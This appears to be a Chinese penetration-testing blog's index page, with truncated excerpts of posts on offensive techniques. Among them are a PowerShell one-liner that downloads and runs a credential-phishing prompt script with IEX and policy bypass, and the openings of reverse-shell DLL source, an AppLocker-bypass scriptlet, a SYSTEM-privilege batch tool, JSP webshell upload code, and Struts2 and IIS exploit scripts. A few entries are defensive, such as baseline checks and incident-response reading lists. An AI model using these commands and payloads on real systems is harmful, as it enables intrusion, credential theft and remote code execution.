获取网站基本信息

就写了个最简单的结合 for 命令使用 #define CURL_STATICLIB //必须在包含curl.h前定义 #include <io.h> #include<iostream> #include"curl/curl.h" #include<ctime> #include&l...

钓管理员密码

post/windows/gather/phish_windows_credentials powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/...

绕过杀软执行payload

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ //exploit/windows/misc/regsvr32_applocker_bypass_server <?XML version="1.0"?> <scriptlet> <registration ...

劫持version.dll 添加用户

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 头文件 #include <iostream> #include <windows.h> #include ...

Meterpreter Shell 过杀软

powershell 方式查杀厉害 需要.net 4.0 环境 https://holdmybeer.xyz/2016/09/11/c-to-windows-meterpreter-in-10mins/ 推荐此种办法 (.net 2.0) https://www.blackhillsinfosec.com/?p=4881 编译...

dll 劫持

http://www.programlife.net/a-deep-insight-into-dll-hijacking-vulnerability.html https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96...

邪恶土豆提权

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://github.com/foxglovesec/RottenPotato http://www.freebuf.com/sectool/98316.html

内网相关

http://www.mottoin.com/92978.html 内网渗透测试定位技术总结 http://www.mottoin.com/88117.html 后渗透阶段的信息收集 内网共享查找 https://github.com/mubix/netview 大全: https://github.com/...

基线检查

https://github.com/re4lity/Benchmarks https://learn.cisecurity.org/benchmarks https://nvd.nist.gov/ncp/repository https://github.com/iadgov/secure-host-baseline ===============================...

应急响应相关文章

1、黑客入侵应急分析手工排查 https://xianzhi.aliyun.com/forum/read/1655.html   2、Web日志安全分析浅谈 https://xianzhi.aliyun.com/forum/read/1723.html   3、应急响应分析技...

runassystem权限小工具

@echo off ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF) del /f /q %result_file% >NUL 2>NUL Rd "%WinDir%\system...

reverse shell dll 源码

#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PR...

关于mssql public权限

1、public 能执行 xp_dirtree 函数 (可以用来dns 回显注入)2、public 权限下不能列任何目录(网上很多文章说public能列)3、mssql dns 回显注入: 网上教程说需要两个域名,实际一个域名就可以:) 配置域名: 条件:...

nc 反弹dll

// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include <winsock2.h> #include <stdlib.h> #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData;...

netcat 及其姐妹工具

转载:http://www.cnblogs.com/starspace/archive/2009/02/17/1392830.html 最喜欢netcat工具了。 一般杀毒软件会把netcat杀掉。 可以用netcat clone 工具CryptCat,支持ssh,还免杀。 查询了一下,n...

CVE-2017-7269 (iis 6 远程执行漏洞)相关脚本

特性:支持 https 支持域名 如果路径错误将自动爆破物理 回显 加入web路径 参考: [1]   https://www.t00ls.net/thread-38987-1-1.html [2] https://ht-sec.org/cve-2017-7269-vulnerabilit...

URL 采集(Google)

来源:https://evi1cg.me/archives/URL.html 作者:Evi1cg var h3 = document.getElementsByTagName('h3'); for(var i=0;i<h3.length;i++){ var a = h3[i]. getElementsByTagName('a'); console...

几款jsp 上传代码

1、sqlmap 带的jsp 上传代码 <jsp:useBean id="prop" scope="page" class="java.util.Properties" /> <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> <%! public String getB...

Strust2 S2-045 一些利用代码

下面几个脚本不错 http://thief.one/2017/03/07/Struts2-045%E6%BC%8F%E6%B4%9E/ https://github.com/tengzhangchao/Struts2_045-Poc 上传文件版 版权归 @_luan 及t00ls 所有 本人(lostwolf)只是修改了下更好用的...

内网渗透概述

[pdfviewer width="100%" height="849px" beta="true/false"]http://7xsnf8.com1.z0.glb.clouddn.com/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AE%80%E8%BF%B0v1.0.pdf[/pdfviewer]

office卸载套件

office 系列产品 卸载极其蛋疼 卸载不干净再装新版本会出现各种问题 以下工具可卸载微软各个版本软件 1、Office 2010 套件删除工具 对于 Windows 8 使用 MicrosoftFixit20055.mini.diagcab 对于 Windows 7...

渗透利器之hash破解

*本博客文章可随意转载,但请注明来源 本文链接:http://wolvez.club/?p=509 0x01 了解hash类型 1 识别hash类型 1.1、  hashID 项目主页:http://psypanda.github.io/hashID/ *kali 下 Hash Identifier...

渗透利器之内网信息获取工具

1、NetBIOS 名称表查询 nbtscan 官网连接: http://www.unixwiz.net/tools/nbtscan.html 简述: nbtscan 实用程序是由 unixwiz.net(http://www.unixwiz.net/tools/nbtscan.html)的Steve Fri...

渗透利器之本地客户端程序密码获取

原创文章 欢迎转载 转载请注明来源:http://wolvez.club/?p=498 严重推荐 http://securityxploded.com/password-recovery-tools.php 相关工具 以及 http://www.nirsoft.net/ 相关工具 以下工具均来源于...

在不需要知道密码的情况下 Hacking MSSQL

本文翻译自:https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/ 原作者:Rick Osgood 版权归原作者所有 0x01 前言 在最近的一次渗透测试中,我抓包的时候无意中注意到一些没...

命令行下基础信息收集

使用wmic识别安装到系统中的补丁情况 C:\> wmic qfe get description,installedOn 识别正在运行的服务 C:\>sc query type= service C:\>net start 识别开机启动的程序,包括路径 C:\>wmic ...

nmap 语法

1、常见端口扫描 map [Scan Type(s)] [Options] {target specification} scan type(s) 用于指定扫描类型 options 用于指定选项 target specification 用于指定扫描目标 -s 指定扫描类型 如下: -sP ...